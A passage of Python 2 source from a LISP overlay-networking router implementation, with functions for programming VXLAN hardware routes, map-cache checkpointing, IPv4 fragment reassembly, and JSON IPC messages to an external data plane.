# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address an associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configure with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list, lisp_gleaned_groups
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Clear gleaned groups data structure.
#
lisp_gleaned_groups = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulated with a source-port of 4341
# and a destination adddress and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsualted packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialized list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if first fragment arrived and we determined its
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happensu
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If are an RTR, we can process the stats directly. If are an ITR we need
# to send an IPC message the the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
